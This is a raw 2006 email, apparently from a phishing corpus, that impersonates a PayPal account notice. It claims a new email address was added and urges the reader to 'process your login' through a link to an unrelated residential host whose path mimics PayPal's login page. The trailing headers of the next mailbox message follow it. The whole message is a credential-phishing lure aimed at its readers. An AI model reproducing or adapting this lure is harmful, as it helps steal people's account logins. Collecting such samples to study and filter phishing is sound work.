From: PP Update <betsypokorny60@msn.com>
Subject: New email address added to your account
Date: Fri, 17 Mar 2006 00:16:51 +0200
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1081
Message-Id: <20060316221742.6D7ED6CCD97@mail1.example.com>
To: undisclosed-recipients: ;
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 631

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="left" class="style2">
  <p class="style2"><FONT face="Courier New" size="2">You have added <b>
	vanhelsing@comcast.net</b> as a new email address for your
	account.</font><br>
    <font face="Courier New" size="2">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
	<a target="_blank" href="http://61-56-132-197-adsl-tpe.STATIC.so-net.net.tw/.bin-cgi/webscr_cmd=_login-run/">process your login</a>. </font> </p>
    </p>
  <p><font face="Courier New" size="2">Thank you for using our service!<br>
    &nbsp;</font></p>
  <address><span style="font-style: normal"><font face="Courier New" size="2">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">For assistance, log in to your 
  	account and click the &quot;Help&quot; link located in the top right corner </span>
  </font>
    </address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">of any 
  	page. </span> <br>
    </font>
    </address>
  <p><font face="Courier New" size="2">E-Mail ID PP1035607</font></p>
</div>
</body>
</html>

From timo5@hotmail.com  Thu Mar 16 17:34:12 2006
Return-Path: <timo5@hotmail.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP
	id 75F76536E2B; Thu, 16 Mar 2006 17:34:12 -0500 (EST)
Received: from avc344488-sv (pool-138-88-2-166.res.east.verizon.net [138.88.2.166])
	by mail1.example.com (Postfix) with SMTP id F12746CCEDB;
	Thu, 16 Mar 2006 17:34:11 -0500 (EST)
Reply-To: timo5@hotmail.com
